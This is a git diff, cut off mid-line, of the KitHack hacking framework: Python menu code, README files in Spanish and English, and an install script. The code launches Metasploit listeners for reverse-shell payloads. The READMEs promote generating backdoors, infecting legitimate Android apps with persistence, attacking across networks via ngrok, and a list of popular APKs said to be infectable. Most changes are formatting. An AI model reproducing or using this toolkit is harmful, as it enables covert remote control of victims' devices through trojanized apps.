ejecutar msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('systemctl stop postgresql && clear') - main() - else: - if not ".tcp.ngrok.io" in LHOST: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD cmd/unix/reverse_perl_ssl; exploit\'"'.format(LHOST, LPORT)) - pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - else: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD cmd/unix/reverse_perl_ssl; exploit\'"') - pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - else: - print("{0}[X] ERROR AL GENERAR SU BACKDOOR\n".format(RED)) - time.sleep(3) - pause("{}Presione cualquier tecla para continuar...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - - else: - print("\n{}[X] OPCION INVALIDA\n".format(RED)) - time.sleep(3) - pause("{}Presione cualquier tecla para continuar...".format(GREEN)) - os.system('clear') - main() - - elif sys == '09': - LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) - LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) - PAYLOAD = input("\n{0}SET PAYLOAD: {1}".format(YELLOW, DEFAULT)) - if ".tcp.ngrok.io" in LHOST: - LHOST = "127.0.0.1" - LPORT = "443" - # continue - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {}; set LPORT {}; set PAYLOAD {}; exploit\'"'.format(LHOST, LPORT, PAYLOAD)) - pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) - os.system('clear') - main() - - else: - print("\n{}[X] OPCION INVALIDA\n".format(RED)) - time.sleep(3) - pause("{}Presione cualquier tecla para continuar...".format(GREEN)) - os.system('clear') - main() - - elif option == '11': - webbrowser.open("https://adrmxr.github.io/KitHack", new=1, autoraise=True) - os.system('clear') - main() - - elif option == '12': - pause("\n{}Presione cualquier tecla para salir...".format(GREEN)) - time.sleep(1) - os.system('clear') - print(exit_main) - exit(0) - - else: - print("\n{}[X] OPCION INVALIDA\n".format(RED)) - time.sleep(3) - os.system('clear') - main() if __name__ == "__main__": - try: - check_connection() - check_permissions() - main() - - except KeyboardInterrupt: - choice = input('\n\n{0}[1] {1}Return KitHack {0}[2] {1}Exit \n{2}KitHack >> {1}'.format(GREEN, DEFAULT, RED)) - choice = choice.zfill(2) - if choice == '01': - if os.path.isfile('/usr/local/bin/kithack'): - os.system('clear && kithack') - else: - os.system('clear && sudo python3 KitHack.py') - - elif choice == '02': - time.sleep(2) - os.system('clear') - print(exit_main) - exit(0) - else: - print("\n{}[x] Opcion invalida.".format(RED)) - time.sleep(2) - exit(0) + try: + check_connection() + check_permissions() + main() + + except KeyboardInterrupt: + choice = input( + "\n\n{0}[1] {1}Return KitHack {0}[2] {1}Exit \n{2}KitHack >> {1}". + format(GREEN, DEFAULT, RED)) + choice = choice.zfill(2) + if choice == "01": + if os.path.isfile("/usr/local/bin/kithack"): + os.system("clear && kithack") + else: + os.system("clear && sudo python3 KitHack.py") + + elif choice == "02": + time.sleep(2) + os.system("clear") + print(exit_main) + exit(0) + else: + print("\n{}[x] Opcion invalida.".format(RED)) + time.sleep(2) + exit(0) diff --git a/README.md b/README.md index ba5c04a..edceac0 100644 --- a/README.md +++ b/README.md @@ -19,16 +19,17 @@

-**Kithack** es un framework diseñado para automatizar el proceso de descarga e instalación de diferentes herramientas para pruebas de penetración, con una opción especial que permite generar puertas traseras multiplataforma mediante Metasploit Framework. +**Kithack** es un framework diseñado para automatizar el proceso de descarga e instalación de diferentes herramientas para pruebas de penetración, con una opción especial que permite generar puertas traseras multiplataforma mediante Metasploit Framework. ## Advertencia -**Actualmente múltiples personas están haciéndose pasar sobre mi persona, difamando que ellos son los creadores de la herramienta KitHack Framework, lo cual es completamente falso. También se dedican a estafar a la gente ofreciendo servicios de hacking en mi nombre, quiero dejar en claro que el objetivo de este proyecto jamás ha sido con fines de comerciabilidad, tal como lo redacto en el apartado final de la web de KitHack, si quieres consultarlo, da click [aquí](https://adrmxr.github.io/KitHack/#licencia). + +**Actualmente múltiples personas están haciéndose pasar sobre mi persona, difamando que ellos son los creadores de la herramienta KitHack Framework, lo cual es completamente falso. También se dedican a estafar a la gente ofreciendo servicios de hacking en mi nombre, quiero dejar en claro que el objetivo de este proyecto jamás ha sido con fines de comerciabilidad, tal como lo redacto en el apartado final de la web de KitHack, si quieres consultarlo, da click [aquí](https://adrmxr.github.io/KitHack/#licencia). Mi único perfil real lo pueden consultar dando click [aquí](https://facebook.com/adrian.guillermo.22).** ## Distribuciones compatibles con KitHack: -| Distribución | Estado | -|--------------|---------------| +| Distribución | Estado | +| ------------ | ------------- | | Kali Linux | Compatible | | Ubuntu | Compatible | | Xbuntu | Compatible | @@ -39,7 +40,7 @@ Mi único perfil real lo pueden consultar dando click [aquí](https://facebook.c | Arch Linux | En desarrollo | | Termux | En desarrollo | -## Instalación: +## Instalación: ```bash # Actualice su lista de paquetes @@ -48,7 +49,7 @@ $ sudo apt update # Instale python3 python3-pip $ sudo apt install python3 python3-pip -# Clone el repositorio +# Clone el repositorio $ git clone https://github.com/AdrMXR/KitHack.git # Entre al repositorio @@ -72,59 +73,64 @@ $ sudo bash uninstall.sh ## Dependencias: -* sudo -* xterm -* postgresql -* Metasploit-Framework -* apktool -* aapt -* jarsigner -* zipalign -* requests -* pwgen -* py-getch -* python-tk -* pathlib -* python-zenity -* pgrep -* Ngrok authtoken +- sudo +- xterm +- postgresql +- Metasploit-Framework +- apktool +- aapt +- jarsigner +- zipalign +- requests +- pwgen +- py-getch +- python-tk +- pathlib +- python-zenity +- pgrep ## Novedades: **1) Depuración de herramientas obsoletas.** + - Es fundamental que nuestros usuarios nos [reporten](mailto:kithacking@gmail.com) cualquier herramienta que no se esté instalando de forma correcta, ya que de esa forma nosotros podremos depurarla completamente de kithack. **2) Integración de nuevas herramientas.** + - Así como depuramos herramientas también integramos algunas nuevas, si tienes algún proyecto personal en github que te gustaría que apareciera en nuestro kit de herramientas, o si estás interesado en ser contribuidor de kithack, lee nuestra [norma de contribución](https://github.com/AdrMXR/KitHack/blob/master/docs/CONTRIBUTING.md). **3) Unificación de tipos de Payloads (por etapas y sin etapas).** + - Kithack nos permite utilizar tanto payloads por etapas como individuales. Si deseas saber sus diferencias, consulta [aquí.](https://adrmxr.github.io/KitHack#tipos-de-payloads) **4) Incorporación de un nuevo método que permite infectar aplicaciones Android legitimas.** + - Kithack nos proporciona la opción de poder infectar una APK original. Cabe destacar que no todas las aplicaciones son vulnerables. -**5) Generación de conexiones TCP con ngrok.** -- Ahora también puedes trabajar con [ngrok](https://ngrok.com) para realizar ataques fuera de tu red sin necesidad de abrir puertos. El archivo de configuración ```ngrok.yml``` se almacena en ```KitHack/.config``` de manera predeterminada. Si por alguna razon necesita que kithack le solicite nuevamente su authtoken escriba ```rm .config/ngrok.yml```. +**5) Automatización de Metasploit.** -**6) Automatización de Metasploit.** - No tienes que perder tiempo en volver a establecer las configuraciones de tu payload, kithack se encarga de poner en escucha a [metasploit](https://www.metasploit.com) de manera rapida. -**7) Personalización de payloads para android.** +**6) Personalización de payloads para android.** + - Ahora también tienes la posibilidad de personalizar tu propio payload para Android. Con kithack puedes cambiar el nombre predeterminado de la apk que genera [metasploit](https://www.metasploit.com) conocido como "MainActivity" y también puedes modificar el icono de Android predeterminado. Da click [aquí](https://github.com/AdrMXR/KitHack/blob/master/icons/LEEME.txt) para conocer el formato. -**8) Aplicación de persistencia automatizada para cualquier APK.** +**7) Aplicación de persistencia automatizada para cualquier APK.** + - Olvidate de que tu sesión de [metasploit](https://www.metasploit.com) expire muy rapido, con kithack ahora podrás generar tu archivo de persistencia para cualquier APK. Si deseas saber como ponerlo en marcha en la shell de meterpreter, da click [aquí.](https://youtu.be/nERwsZyIVeo) -**9) Ejecución de herramientas.** +**8) Ejecución de herramientas.** + - Ahora el usuario podrá ejecutar las herramientas directamente desde kithack a pesar de que ya se encuentren instaladas. -**10) Creación de ```clean.sh```.** -- Si necesitas eliminar el contenido que te ha generado kithack en tus carpetas `tools` y `output`, puedes ejecutar el archivo `clean.sh` para hacerlo de forma rápida. +**9) Creación de `clean.sh`.** + +- Si necesitas eliminar el contenido que te ha generado kithack en tus carpetas `tools` y `output`, puedes ejecutar el archivo `clean.sh` para hacerlo de forma rápida. -## Algunas APK vulnerables: +## Algunas APK vulnerables: -| APK | Versión | -|---------------------|--------------| +| APK | Versión | +| ------------------- | ------------ | | FaceApp | 1.00 | | Pou | 1.4.79 | | Google Now Launcher | 1.4.large | @@ -136,23 +142,24 @@ $ sudo bash uninstall.sh | Ccleaner | 1.19.74 | | AVG Cleaner | 2.0.2 | - ## Screenshots: +## Screenshots: -| Menu principal | Generador de backdoors | -| -------------- | ---------------------- | -|![Index](https://github.com/AdrMXR/KitHack/blob/master/images/screenshot-1.png)|![f](https://github.com/AdrMXR/KitHack/blob/master/images/screenshot-2.png) +| Menu principal | Generador de backdoors | +| ------------------------------------------------------------------------------- | --------------------------------------------------------------------------- | +| ![Index](https://github.com/AdrMXR/KitHack/blob/master/images/screenshot-1.png) | ![f](https://github.com/AdrMXR/KitHack/blob/master/images/screenshot-2.png) | -## Videos: +## Videos: + +| Demo 1 | Demo 2 | +| --------------------------------------------------------------------------------------------------------------------------------------------------- | --------------------------------------------------------------------------------------------------------------------------------------------------- | +| | | -| Demo 1 | Demo 2 | -| ------ | ------ | -|

## Menu: - [Android](https://github.com/AdrMXR/KitHack/blob/master/docs/TOOLS.md#android) -- [Windows](https://github.com/AdrMXR/KitHack/blob/master/docs/TOOLS.md#windows) +- [Windows](https://github.com/AdrMXR/KitHack/blob/master/docs/TOOLS.md#windows) - [Phishing](https://github.com/AdrMXR/KitHack/blob/master/docs/TOOLS.md#phishing) - [Wifi Attacks](https://github.com/AdrMXR/KitHack/blob/master/docs/TOOLS.md#wifi-attacks) - [Passwords Attacks](https://github.com/AdrMXR/KitHack/blob/master/docs/TOOLS.md#passwords-attacks) @@ -162,7 +169,7 @@ $ sudo bash uninstall.sh - [Others](https://github.com/AdrMXR/KitHack/blob/master/docs/TOOLS.md#others) - [Backdoors with msfvenom](https://github.com/AdrMXR/KitHack/blob/master/docs/TOOLS.md#backdoors-with-msfvenom) -## Bug? +## Bug? Si encuentra algun fallo en la herramienta siga los siguientes pasos: @@ -170,10 +177,10 @@ Si encuentra algun fallo en la herramienta siga los siguientes pasos: 2. Contactarme mediante el siguiente correo: kithacking@gmail.com 3. Mandar el screenshot y explicar su problemática con ese fallo. -## Contribuidores: +## Contribuidores: -- Ironpuerquito -- C1b0rk +- Ironpuerquito +- C1b0rk ## Licencia: @@ -198,11 +205,3 @@ AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. - - - - - - - - diff --git a/docs/TOOLS.md b/docs/TOOLS.md index bc5b9f9..a5f4c0d 100644 --- a/docs/TOOLS.md +++ b/docs/TOOLS.md @@ -96,8 +96,7 @@ - [Dirsearch](https://github.com/maurosoria/dirsearch) - [XSStrike](https://github.com/s0md3v/XSStrike) - [LinksF1nd3r](https://github.com/ihebski/LinksF1nd3r) -- [D-Tech](https://github.com/bibortone/D-Tech) - -[Phpsploit](https://github.com/nil0x42/phpsploit) +- [D-Tech](https://github.com/bibortone/D-Tech) -[Phpsploit](https://github.com/nil0x42/phpsploit) ### Spoofing: @@ -110,22 +109,22 @@ ### Information Gathering: -- [Nmap](https://github.com/nmap/nmap) -- [Th3inspector](https://github.com/Moham3dRiahi/Th3inspector) -- [Facebook Information](https://github.com/xHak9x/fbi) -- [Infoga](https://github.com/m4ll0k/Infoga) -- [Crips](https://github.com/Manisso/Crips) -- [BillCipher](https://github.com/GitHackTools/BillCipher) -- [RED_HAWK](https://github.com/Tuhinshubhra/RED_HAWK) -- [Recon-ng](https://github.com/lanmaster53/recon-ng) -- [TheHarvester](https://github.com/alanchavez88/theHarvester) -- [PhoneInfoga](https://github.com/sundowndev/PhoneInfoga) -- [Gasmask](https://github.com/twelvesec/gasmask) -- [URLextractor](https://github.com/eschultze/URLextractor) -- [Devploit](https://github.com/GhettoCole/Devploit) -- [ReconDog](https://github.com/s0md3v/ReconDog) -- [Webkiller](https://github.com/ultrasecurity/webkiller) -- [Quasar](https://github.com/Cyb0r9/quasar) +- [Nmap](https://github.com/nmap/nmap) +- [Th3inspector](https://github.com/Moham3dRiahi/Th3inspector) +- [Facebook Information](https://github.com/xHak9x/fbi) +- [Infoga](https://github.com/m4ll0k/Infoga) +- [Crips](https://github.com/Manisso/Crips) +- [BillCipher](https://github.com/GitHackTools/BillCipher) +- [RED_HAWK](https://github.com/Tuhinshubhra/RED_HAWK) +- [Recon-ng](https://github.com/lanmaster53/recon-ng) +- [TheHarvester](https://github.com/alanchavez88/theHarvester) +- [PhoneInfoga](https://github.com/sundowndev/PhoneInfoga) +- [Gasmask](https://github.com/twelvesec/gasmask) +- [URLextractor](https://github.com/eschultze/URLextractor) +- [Devploit](https://github.com/GhettoCole/Devploit) +- [ReconDog](https://github.com/s0md3v/ReconDog) +- [Webkiller](https://github.com/ultrasecurity/webkiller) +- [Quasar](https://github.com/Cyb0r9/quasar) - [Info-instagram-iphone](https://github.com/0xfff0800/info-instagram-iphone) - [UserScan](https://github.com/JoeTech-Studio/UserScan) - [XCTR-Hacking-Tools](https://github.com/capture0x/XCTR-Hacking-Tools) @@ -139,7 +138,6 @@ - [QRLJacking](https://github.com/OWASP/QRLJacking) - [Lazy](https://github.com/arismelachroinos/lscript) - [HTB-INVITE](https://github.com/nycto-hackerone/HTB-INVITE) -- [Ngrok](https://ngrok.com) - [Bluepot](https://github.com/andrewmichaelsmith/bluepot) - [Social-engineer-toolkit](https://github.com/trustedsec/social-engineer-toolkit) - [A2sv](https://github.com/hahwul/a2sv) @@ -163,8 +161,8 @@ ### Backdoors with msfvenom: -| Sistema | Formato | -|---------|---------------| +| Sistema | Formato | +| ------- | ------------- | | Linux | Kithack.elf | | Windows | Kithack.exe | | Android | Kithack.apk | diff --git a/docs/translations/English/README.md b/docs/translations/English/README.md index 3c2cd6f..93eb130 100644 --- a/docs/translations/English/README.md +++ b/docs/translations/English/README.md @@ -23,19 +23,19 @@ ## KitHack Compatible Distributions: -| Distribution | State | -|--------------|---------------| -| Kali Linux | Compatible | -| Ubuntu | Compatible | -| Xbuntu | Compatible | -| Debian | Compatible | -| Raspbian | Compatible | -| Deepin | Compatible | -| Parrot OS | Compatible | -| Arch Linux | Developing | -| Termux | Developing | - -## Installation: +| Distribution | State | +| ------------ | ---------- | +| Kali Linux | Compatible | +| Ubuntu | Compatible | +| Xbuntu | Compatible | +| Debian | Compatible | +| Raspbian | Compatible | +| Deepin | Compatible | +| Parrot OS | Compatible | +| Arch Linux | Developing | +| Termux | Developing | + +## Installation: ```bash # Update your package list @@ -44,7 +44,7 @@ $ sudo apt update # Install python3 python3-pip $ sudo apt install python3 python3-pip -# Clone the repository +# Clone the repository $ git clone https://github.com/AdrMXR/KitHack.git # Enter the repository @@ -68,59 +68,64 @@ $ sudo bash uninstall.sh ## Dependencies: -* sudo -* xterm -* postgresql -* Metasploit-Framework -* apktool -* aapt -* jarsigner -* zipalign -* requests -* pwgen -* py-getch -* python-tk -* pathlib -* python-zenity -* pgrep -* Ngrok authtoken +- sudo +- xterm +- postgresql +- Metasploit-Framework +- apktool +- aapt +- jarsigner +- zipalign +- requests +- pwgen +- py-getch +- python-tk +- pathlib +- python-zenity +- pgrep ## New features: **1) Debugging of obsolete tools.** + - It is essential that our users [report us](mailto:kithacking@gmail.com) any tool that is not being installed correctly, since that way we will be able to completely debug it from kithack. **2) Integration of new tools.** + - As we debug tools we also integrate some new ones, if you have a personal project on github that you would like to appear in our toolkit, or if you are interested in being a kithack contributor, read our [contribution policy](https://github.com/AdrMXR/KitHack/blob/master/docs/CONTRIBUTING.md). **3) Unification of types of Payloads (by stages and without stages).** + - Kithack allows us to use payloads in stages and individual. If you want to know their differences, see [here.](Https://adrmxr.github.io/KitHack#tipos-de-payloads) **4) Incorporation of a new method that allows infecting legitimate Android applications.** + - Kithack gives us the option to infect an original APK. It should be noted that not all applications are vulnerable. -**5) Generation of TCP connections with ngrok.** -- Now you can also work with [ngrok](https://ngrok.com) to carry out attacks outside your network without the need to open ports. The configuration file ```ngrok.yml``` is stored in ```KitHack/.config``` by default. If for some reason you need kithack to request your authtoken again, write ```rm .config/ngrok.yml```. +**5) Metasploit Automation.** -**6) Metasploit Automation.** - You don't have to waste time re-setting your payload settings, kithack takes care of listening to [metasploit](https://www.metasploit.com) quickly. -**7) Custom payloads for android.** +**6) Custom payloads for android.** + - Now you also have the possibility to customize your own payload for Android. With kithack you can change the default name of the apk generated by [metasploit](https://www.metasploit.com) known as "MainActivity" and you can also modify the default Android icon. Click [here](https://github.com/AdrMXR/KitHack/blob/master/icons/LEEME.txt) to know the format. -**8) Automated persistence application for any APK.** +**7) Automated persistence application for any APK.** + - Forget that your [metasploit] session (https://www.metasploit.com) expires very fast, with kithack you can now generate your persistence file for any APK. If you want to know how to start it in the meterpreter shell, click [here.](https://youtu.be/nERwsZyIVeo) -**9) Run tools.** +**8) Run tools.** + - Now the user can run the tools directly from kithack even though they are already installed. -**10) Creation of ```clean.sh```.** +**9) Creation of `clean.sh`.** + - If you need to remove the content that kithack has generated in your `tools` and `output` folders, you can run the `clean.sh` file to do it quickly. -## Some vulnerable APK: +## Some vulnerable APK: -| APK | Version | -|---------------------|--------------| +| APK | Version | +| ------------------- | ------------ | | FaceApp | 1.00 | | Pou | 1.4.79 | | Google Now Launcher | 1.4.large | @@ -132,23 +137,24 @@ $ sudo bash uninstall.sh | Ccleaner | 1.19.74 | | AVG Cleaner | 2.0.2 | - ## Screenshots: +## Screenshots: + +| Main menu | Backdoor generator | +| ------------------------------------------------------------------------------- | --------------------------------------------------------------------------- | +| ![Index](https://github.com/AdrMXR/KitHack/blob/master/images/screenshot-1.png) | ![f](https://github.com/AdrMXR/KitHack/blob/master/images/screenshot-2.png) | -| Main menu | Backdoor generator | -| -------------- | ---------------------- | -|![Index](https://github.com/AdrMXR/KitHack/blob/master/images/screenshot-1.png)|![f](https://github.com/AdrMXR/KitHack/blob/master/images/screenshot-2.png) +## Videos: -## Videos: +| Demo 1 | Demo 2 | +| --------------------------------------------------------------------------------------------------------------------------------------------------- | --------------------------------------------------------------------------------------------------------------------------------------------------- | +| | | -| Demo 1 | Demo 2 | -| ------ | ------ | -|

## Menu: - [Android](https://github.com/AdrMXR/KitHack/blob/master/docs/TOOLS.md#android) -- [Windows](https://github.com/AdrMXR/KitHack/blob/master/docs/TOOLS.md#windows) +- [Windows](https://github.com/AdrMXR/KitHack/blob/master/docs/TOOLS.md#windows) - [Phishing](https://github.com/AdrMXR/KitHack/blob/master/docs/TOOLS.md#phishing) - [Wifi Attacks](https://github.com/AdrMXR/KitHack/blob/master/docs/TOOLS.md#wifi-attacks) - [Passwords Attacks](https://github.com/AdrMXR/KitHack/blob/master/docs/TOOLS.md#passwords-attacks) @@ -158,7 +164,7 @@ $ sudo bash uninstall.sh - [Others](https://github.com/AdrMXR/KitHack/blob/master/docs/TOOLS.md#others) - [Backdoors with msfvenom](https://github.com/AdrMXR/KitHack/blob/master/docs/TOOLS.md#backdoors-with-msfvenom) -## Bug? +## Bug? If the tool fails, follow these steps: @@ -166,10 +172,10 @@ If the tool fails, follow these steps: 2. Contact me through the following email: kithacking@gmail.com 3. Submit the screenshot and explain your problem with that error. -## Contributors: +## Contributors: -- Ironpuerquito -- C1b0rk +- Ironpuerquito +- C1b0rk ## Licence: diff --git a/install.sh b/install.sh index 92fa6b4..fa573db 100755 --- a/install.sh +++ b/install.sh @@ -14,275 +14,269 @@ orange='\e[38;5;166m' green='\033[92m' # Location -path=$(pwd) +path=$PWD -# Check root -if [ "$(id -u)" != "0" ] > /dev/null 2>&1; then -echo -e '\n$red[x] Este script necesita permisos root.' 1>&2 -exit +# Check root +if [ "$(id -u)" != "0" ] >/dev/null 2>&1; then + echo -e '\n$red[x] Este script necesita permisos root.' 1>&2 + exit fi -# Banner +# Banner clear sleep 2 echo -e "$yellow ___ __ .__ .__ " -echo -e "$yellow | | ____ _______/ |______ | | | | ___________ " -echo -e "$yellow | |/ \ / ___/\ __\__ \ | | | | _/ __ \_ __ \ " -echo -e "$yellow | | | \___ \ | | / __ \| |_| |_\ ___/| | \/ " +echo -e "$yellow | | ____ _______/ |______ | | | | ___________ " +echo -e "$yellow | |/ \ / ___/\ __\__ \ | | | | _/ __ \_ __ \ " +echo -e "$yellow | | | \___ \ | | / __ \| |_| |_\ ___/| | \/ " echo -e "$yellow |___|___| /____ > |__| (____ /____/____/\___ >__| /\ /\ /\ " echo -e "$yellow \/ \/ \/ \/ \/ \/ \/ " echo -e " " echo -e "$orange Setup KitHack v1.3.2 " echo -e " " echo -e "$orange By:AdrMXR " - + # Check if there is an internet connection -ping -c 1 google.com > /dev/null 2>&1 +ping -c 1 google.com >/dev/null 2>&1 if [[ "$?" == 0 ]]; then -echo "" -echo -e "$green[✔][Internet Connection]............[ OK ]" -sleep 1.5 + echo "" + echo -e "$green[✔][Internet Connection]............[ OK ]" + sleep 1.5 else -echo "" -echo -e "$red[!][Internet Connection].........[ NOT FOUND ]" -echo "" -exit + echo "" + echo -e "$red[!][Internet Connection].........[ NOT FOUND ]" + echo "" + exit fi # Check dependencies -echo -e $yellow -echo -n [*] Checando dependencias...= ; -sleep 3 & while [ "$(ps a | awk '{print $1}' | grep $!)" ] ; do for X in '-' '\' '|' '/'; do echo -en "\b$X"; sleep 0.1; done; done +echo -e "$yellow" +echo -n [*] Checando dependencias...= +sleep 3 & +while [ "$(ps a | awk '{print $1}' | grep $!)" ]; do for X in '-' '\' '|' '/'; do + echo -en "\b$X" + sleep 0.1 +done; done echo "" # Check if xterm exists -which xterm > /dev/null 2>&1 +which xterm >/dev/null 2>&1 if [ "$?" -eq "0" ]; then -echo "" -echo -e "$green[✔][Xterm]..........................[ OK ]" -sleep 1.5 + echo "" + echo -e "$green[✔][Xterm]..........................[ OK ]" + sleep 1.5 else -echo "" -echo -e "$red[x][Xterm].......................[ NOT FOUND ]" -sleep 1.5 -echo -e "$yellow[!][Installing Xterm...]" -sudo apt-get install -y xterm > /dev/null + echo "" + echo -e "$red[x][Xterm].......................[ NOT FOUND ]" + sleep 1.5 + echo -e "$yellow[!][Installing Xterm...]" + sudo apt-get install -y xterm >/dev/null fi # Check if postgresql exists -which /etc/init.d/postgresql > /dev/null 2>&1 +which /etc/init.d/postgresql >/dev/null 2>&1 if [ "$?" -eq "0" ]; then -echo -e "$green[✔][Postgresql].....................[ OK ]" -sleep 1.5 + echo -e "$green[✔][Postgresql].....................[ OK ]" + sleep 1.5 else -echo -e "$red[x][Postgresql]..................[ NOT FOUND ]" -sleep 1.5 -echo -e "$yellow[!][Installing Postgresql...]" -xterm -T "INSTALLER POSTGRESQL" -geometry 100x30 -e "sudo apt-get install -y postgresql" -fi + echo -e "$red[x][Postgresql]..................[ NOT FOUND ]" + sleep 1.5 + echo -e "$yellow[!][Installing Postgresql...]" + xterm -T "INSTALLER POSTGRESQL" -geometry 100x30 -e "sudo apt-get install -y postgresql" +fi -# Check if metasploit framework exists -which msfconsole > /dev/null 2>&1 +# Check if metasploit framework exists +which msfconsole >/dev/null 2>&1 if [ "$?" -eq "0" ]; then -echo -e "$green[✔][Metasploit Framework]...........[ OK ]" -sleep 1.5 + echo -e "$green[✔][Metasploit Framework]...........[ OK ]" + sleep 1.5 else -echo -e "$red[x][Metasploit Framework]........[ NOT FOUND ]" -sleep 1.5 -echo -e "$yellow[!][Installing Metasploit-Framework...]" -xterm -T "INSTALLER METASPLOIT FRAMEWORK" -geometry 100x30 -e "curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall && chmod 755 msfinstall && ./msfinstall && sudo apt-get update && apt-get upgrade" + echo -e "$red[x][Metasploit Framework]........[ NOT FOUND ]" + sleep 1.5 + echo -e "$yellow[!][Installing Metasploit-Framework...]" + xterm -T "INSTALLER METASPLOIT FRAMEWORK" -geometry 100x30 -e "curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall && chmod 755 msfinstall && ./msfinstall && sudo apt-get update && apt-get upgrade" fi -# Check if apktool exists -which apktool > /dev/null 2>&1 +# Check if apktool exists +which apktool >/dev/null 2>&1 if [ "$?" -eq "0" ]; then -echo -e "$green[✔][Apktool]........................[ OK ]" -sleep 1.5 + echo -e "$green[✔][Apktool]........................[ OK ]" + sleep 1.5 else -echo -e "$red[x][Apktool].....................[ NOT FOUND ]" -sleep 1.5 -echo -e "$yellow[!][Installing Apktool...]" -xterm -T "INSTALLER APKTOOL" -geometry 100x30 -e "wget -O apktool.jar https://bitbucket.org/iBotPeaches/apktool/downloads/apktool_2.4.0.jar && wget https://raw.githubusercontent.com/iBotPeaches/Apktool/master/scripts/linux/apktool && mv apktool* /usr/local/bin && chmod +x /usr/local/bin/apktool*" + echo -e "$red[x][Apktool].....................[ NOT FOUND ]" + sleep 1.5 + echo -e "$yellow[!][Installing Apktool...]" + xterm -T "INSTALLER APKTOOL" -geometry 100x30 -e "wget -O apktool.jar https://bitbucket.org/iBotPeaches/apktool/downloads/apktool_2.4.0.jar && wget https://raw.githubusercontent.com/iBotPeaches/Apktool/master/scripts/linux/apktool && mv apktool* /usr/local/bin && chmod +x /usr/local/bin/apktool*" fi # Check if aapt exists -which aapt > /dev/null 2>&1 +which aapt >/dev/null 2>&1 if [ "$?" -eq "0" ]; then -echo -e "$green[✔][Aapt]...........................[ OK ]" -sleep 1.5 + echo -e "$green[✔][Aapt]...........................[ OK ]" + sleep 1.5 else -echo -e "$red[x][Aapt]........................[ NOT FOUND ]" -sleep 1.5 -echo -e "$yellow[!][Installing Aapt...]" -xterm -T "INSTALLER AAPT" -geometry 100x30 -e "sudo apt-get install -y aapt && sudo apt-get install -y android-framework-res" + echo -e "$red[x][Aapt]........................[ NOT FOUND ]" + sleep 1.5 + echo -e "$yellow[!][Installing Aapt...]" + xterm -T "INSTALLER AAPT" -geometry 100x30 -e "sudo apt-get install -y aapt && sudo apt-get install -y android-framework-res" fi # Check if jarsigner exists -which jarsigner > /dev/null 2>&1 +which jarsigner >/dev/null 2>&1 if [ "$?" -eq "0" ]; then -echo -e "$green[✔][Jarsigner]......................[ OK ]" -sleep 1.5 + echo -e "$green[✔][Jarsigner]......................[ OK ]" + sleep 1.5 else -echo -e "$red[x][Jarsigner]...................[ NOT FOUND ]" -sleep 1.5 -echo -e "$yellow[!][Installing Jarsigner...]" -xterm -T "INSTALLER JARSIGNER" -geometry 100x30 -e "sudo apt-get install default-jdk" + echo -e "$red[x][Jarsigner]...................[ NOT FOUND ]" + sleep 1.5 + echo -e "$yellow[!][Installing Jarsigner...]" + xterm -T "INSTALLER JARSIGNER" -geometry 100x30 -e "sudo apt-get install default-jdk" fi # Check if zipalign exists -which zipalign > /dev/null 2>&1 +which zipalign >/dev/null 2>&1 if [ "$?" -eq "0" ]; then -echo -e "$green[✔][Zipalign].......................[ OK ]" -sleep 1.5 + echo -e "$green[✔][Zipalign].......................[ OK ]" + sleep 1.5 else -echo -e "$red[x][Zipalign]....................[ NOT FOUND ]" -sleep 1.5 -echo -e "$yellow[!][Installing Zipalign...]" -xterm -T "INSTALLER ZIPALIGN" -geometry 100x30 -e "sudo apt-get install -y zipalign" + echo -e "$red[x][Zipalign]....................[ NOT FOUND ]" + sleep 1.5 + echo -e "$yellow[!][Installing Zipalign...]" + xterm -T "INSTALLER ZIPALIGN" -geometry 100x30 -e "sudo apt-get install -y zipalign" fi # Check if pwgen exists -which pwgen > /dev/null 2>&1 +which pwgen >/dev/null 2>&1 if [ "$?" -eq "0" ]; then -echo -e "$green[✔][Pwgen]..........................[ OK ]" -sleep 1.5 + echo -e "$green[✔][Pwgen]..........................[ OK ]" + sleep 1.5 else -echo -e "$red[x][Pwgen].......................[ NOT FOUND ]" -sleep 1.5 -echo -e "$yellow[!][Installing Pwgen...]" -xterm -T "INSTALLER PWGEN" -geometry 100x30 -e "sudo apt-get install pwgen" -fi - -# Check if ngrok exists -arch=`arch` -if [ -f "ngrok" ]; then -echo -e "$green[✔][Ngrok]..........................[ OK ]" -sleep 1.5 -else -echo -e "$red[x][Ngrok]........................[ NOT FOUND ]" -sleep 1.5 -echo -e "$yellow[!][Downloading ngrok...]" -if [ "$arch" == "x86_64" ]; then -xterm -T "DOWNLOAD NGROK" -geometry 100x30 -e "wget https://bin.equinox.io/a/kpRGfBMYeTx/ngrok-2.2.8-linux-amd64.zip && unzip ngrok-2.2.8-linux-amd64.zip" -rm ngrok-2.2.8-linux-amd64.zip -else -xterm -T "DOWNLOAD NGROK" -geometry 100x30 -e "wget https://bin.equinox.io/a/4hREUYJSmzd/ngrok-2.2.8-linux-386.zip && unzip ngrok-2.2.8-linux-386.zip" -rm ngrok-2.2.8-linux-386.zip -fi + echo -e "$red[x][Pwgen].......................[ 